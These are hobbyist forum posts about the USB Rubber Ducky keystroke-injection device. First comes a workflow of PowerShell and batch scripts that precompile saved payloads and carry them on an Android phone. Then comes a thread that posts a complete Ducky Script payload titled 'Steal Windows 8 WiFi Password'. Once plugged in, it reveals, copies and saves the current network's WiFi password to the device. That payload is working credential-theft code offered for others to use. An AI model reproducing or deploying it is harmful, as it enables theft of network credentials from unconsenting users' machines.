[DAPPR - Ducky Android Pocket Payload Reserve]

Well i am just starting of codeing for android so i will give it ago and see were i get

Thats awesome! Good luck!

[DAPPR - Ducky Android Pocket Payload Reserve]

It is really not so hard to do without an app. However, I do think that an app that allows syncing with a cloud service like Google Drive, and has built in shortcuts to the Online Encoder Website, and the Hak5 Ducky forums so you can stay up-to-date with payloads would be cool.

It'd also be nifty if there was an easy way to copy the source from the forum posts and quickly submit it to the online Duck Encoder.

If anyone has the skillset to create something like this, I think it would be a great way to expand the mobility and practicality of the ducky as an attack platform.

[DAPPR - Ducky Android Pocket Payload Reserve]

It's a good solution. Maybe somebody will design an app that does this.

That was my hope! It sure makes the platform much more mobile and flexible.

[DAPPR - Ducky Android Pocket Payload Reserve]

So how did you get the tablet to move the compiled file to the root of the drive? Is there some drag and drop feature in the file explorer?

On my Galaxy S4 Active, when I plugged in the 4CAP duck, i got a notification that I attached mass storage, which opened by default "My Files", which you can use to copy and paste from where you stored the bin files to the ducky.

[DAPPR - Ducky Android Pocket Payload Reserve]

The following is a true story of a small victory I felt that I should share, and maybe help someone with similar interests.

This is likely not the easiest way to achieve this, but it was a simple concept I wanted to give a shot.

I had an idea the other day to copy all of my saved payloads onto my android phone. This way, whenever I might be feeling mischievous, *err*, need to perform "administrative tasks", I could do so without going to my laptop. which I might not have on me, choosing the script, compiling, and transferring onto my ducky.

Step 1: Organization

My goal was to "pre-compile", and relocate each source file, along with its resulting inject.bin file into its own directory, so as to easily access them on my android; easy selection, and transfer them quickly to the storage of my ducky.

Originally, I had about 40 scripts saved as .txt files in a directory named "Payloads".

[Payloads]
|
|----Payload1.txt
|----Payload2.txt
|----Payload3.txt

etc.

With a bit of windows, and a crash course in powershell-fu, I made a script to create directories with the name of the payload, and move the payload into its respective directory.

MakeDirAndRename.ps1:

$files = get-childitem "C:\Users\Cola\Desktop\Duck\Payloads\*.txt"
ForEach ($file in $files) {
    $dirname = $file.BaseName
    New-Item -Path $dirname -type directory
    Move-Item $file $dirname
}

Result:

[Payloads]
|
|----[Payload1]
|    |
|    |----Payload1.txt
|
|
|----[Payload2]
|    |
|    |----Payload2.txt
|
|
|----[Payload3]
|    |
|    |----Payload3.txt


etc.

Step 2: Compiling Recursively

Realizing that the compiler looks for files named payload.txt, I made another script to recursively rename them all to payload.txt, in retrospect, I would have just modified the compiler batch file to look recursively through the directories and compile all the things, but its all about learning, so this is what I did:

RecursiveRename.ps1

get-childItem -recurse | Where {$_.extension -eq ".txt"} | rename-item -newname payload.txt

Result:

[Payloads]
|
|----[Payload1]
|    |
|    |----payload.txt
|
|
|----[Payload2]
|    |
|    |----payload.txt
|
|
|----[Payload3]
|    |
|    |----payload.txt


etc.

I modified the compiler to include the path to encode.jar, then wrote a cute little batch script to run the compiler.bat in each directory recursively.

call "C:\Users\Cola\Desktop\Duck\Payloads\compile.bat"
for /r /d %%x in (*) do (
    pushd "%%x"
    call "C:\Users\Cola\Desktop\Duck\Payloads\compile.bat"
    popd
)

The final result:

[Payloads]
|
|----[Payload1]
|    |
|    |----Payload1.txt
|    |----inject.bin
|
|----[Payload2]
|    |
|    |----Payload2.txt
|    |----inject.bin
|
|----[Payload3]
|    |
|    |----Payload3.txt
|    |----inject.bin

etc.

Pardon the icky, roundabout way, but with my limited windows/IT background, I was pretty darn happy when I got it all working.

Step 3: Deployment

After organizing the files in a phone/tablet friendly way, and eliminating the need to compile every time I needed to change scripts, I transferred all of the directories onto a folder on my phones built in storage. To retrieve them, I will either plug the ducky in to my phone via OTG cable (I'm using 4CAP firmware), or just the SD card.

I hadn't seen anything about this and the idea just kinda hit me when I had my ducky with me, but no laptop.

Please give me some feedback on what I've done and let me know what I could have done better!

Also, I'd love to see some similar stories!

EDIT: Wrapping up

After experimentation, I decided to add a bookmark to http://ducktoolkit-411.rhcloud.com/Home.jsp to my home screen, next to my preferred filesystem browser

This has the Online Duck Encoder, and various other recources.

[[Payload] Steal Windows 8 WiFi Password! - My first ducky script]

Well I am wanting to know, does this bypass the account admin password when you ask for the wifi password? I know I had to type in the account password to see the wifi password.

It does not, on my Win8 machine, I am not asked for a password. There is a little "Admin Shield Thing" next to show password, but I am never prompted for anything.

I wonder why this is?

[[Payload] Steal Windows 8 WiFi Password! - My first ducky script]

Just got my ducky in the mail to day, and I'm having a blast!

[Payload] Win8Wifi

Features

• Windows 8
• Takes 9 seconds on my computer, including about a 3 second delay at start
• Uses keyboard trickery to copy wifi password of current connected network
• Saves file to Storage volume named DUCKY (Either flash drive, or you can use Twin Duck firmware)
• Works without disturbing current windows. My first version had to jump to the desktop

Requirements:

• I was using the composite ducky firmware found HERE. The Twin Duck firmware should also work. found HERE

• Windows 8

• Must be connected to a protected network

CODE:

DELAY 2000
GUI i
DELAY 100
TAB
ENTER
DELAY 100
TAB
MENU
DELAY 100
UPARROW
DELAY 100
ENTER
DELAY 100
DELAY 100
ALT h
DELAY 100
ALT k
DELAY 100
CTRL C
DELAY 100
GUI r
DELAY 100
DELAY 100
STRING notepad
ENTER
DELAY 100
DELAY 100
CTRL v
DELAY 100
CTRL s
DELAY 100
DELAY 100
TAB
REPEAT 5
DELAY 100
ENTER
DELAY 100
STRING DUCKY
DELAY 200
DOWNARROW
DELAY 100
ENTER
DELAY 100
ALT n
DELAY 100
STRING Wifipass.txt
ENTER
DELAY 100
ALT F4
DELAY 100
ALT F4

NOTE: There is a large delay at the beginning to allow the ducky's storage to mount, and pop up. Adjust this as you see fit.

This was very fun to write, please leave me suggestions for improvement! (Including if anyone knows a shortcut to pull up the "Networks Charm"